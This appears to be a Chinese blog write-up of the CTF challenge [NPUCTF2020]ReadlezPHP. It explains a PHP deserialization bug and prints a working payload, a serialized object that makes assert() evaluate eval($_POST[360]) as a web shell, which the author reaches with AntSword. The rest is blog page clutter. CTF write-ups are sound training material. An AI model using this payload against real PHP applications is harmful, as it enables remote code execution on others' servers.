[NPUCTF2020]ReadlezPHP

最新推荐文章于 2025-03-17 20:06:11 发布
最新推荐文章于 2025-03-17 20:06:11 发布
阅读量179 收藏
点赞数 2
分类专栏: Buuctf刷题篇 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_49656607/article/details/120087764
版权

每天一题,记录学习

在这里插入图片描述
首先注意到的就是右键看不了源码,那就直接抓包来看,可恶,注意到有一个隐藏的 <a href="./time.php?source"></a> 标签
在这里插入图片描述
去访问这个./time.php?source 看看,很明显就是一道反序列化的题目
在这里插入图片描述
代码很简单,就是$a$b形成嵌套$b($a) 来执行就行了

注意一下eval和assert的区别

evalassert
二者都可以执行PHP语句。只不过是,eval规范更加严格一些,必须符合PHP代码要求。而assert则没有那么严格,执行PHP表达式即可。

eval 函数把字符串按照 PHP 代码来计算 (执行),该字符串必须是合法的 PHP 代码,且必须以分号结尾
如eval(“echo 1;”)
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false

assert 函数功能是判断一个表达式是否成立,返回true or false,重点是函数会执行此表达式。如果表达式为函数如assert(“echo(1)”),则会输出1,而如果为assert(“echo 1;”)则不会有输出。

payload

 <?php
class HelloPhp
{
    public $a='eval($_POST[360])';
    public $b='assert';
}
$c = new HelloPhp;
echo serialize($c);

//O:8:"HelloPhp":2:{s:1:"a";s:17:"eval($_POST[360])";s:1:"b";s:6:"assert";}

在这里插入图片描述
这个时候如果你和我一样去用蚁剑去连,会发现啥也没有都是空【无语】
在这里插入图片描述
因为flag 就藏在phpinfo()
在这里插入图片描述

[NPUCTF2020]EzRSA
2er0!=O的博客
07-25 689
[NPUCTF2020]EzRSA 附件: from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fla
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1191
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb、
[NPUCTF2020]ReadlezPHP wp
最新发布
2303_80867263的博客
03-17 378
eval()里的引号必须是双引号,而assert()可以将整个字符串参数当作php参数执行,以及不能以变量函数的形式调用eval。发现是一个很明显的反序列化,变量b是函数,a是值,那么b可以为system,assert这些,但这里不能用eval,因为。我构造了一个$b=system,$a=ls / 的失败了,可能是过滤了吧,那就用phpinfo看看禁用了哪些,之后还是没找到flag,看了下大佬的wp,原来就在phpinfo里面。发现点不了右键,那就用ctel+u看看源代码。
mysql inner join 和join_mysql中的7种联表join
weixin_39703773的博客
12-01 162
建表在这里呢我们先来建立两张有外键关联的张表。CREATE DATABASE db0206;USE db0206;CREATE TABLE `db0206`.`tbl_dept`( `id` INT(11) NOT NULL AUTO_INCREMENT, `deptName` VARCHAR(30), `locAdd` VARCHAR(40), PRIMARY KEY (`id...
buuctf.web 32-64
m0_73889365的博客
02-18 906
buuctf.web 刷题
序列化和反序列化刷题记录
一只菜鸡
01-28 1761
BUU CODE REVIEW\ *反序列化 md5 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try {
[NPUCTF2020]EzRSA Writeup
bestkasscn的博客
12-02 623
[NPUCTF2020]EzRSA 题目描述 from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fl
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值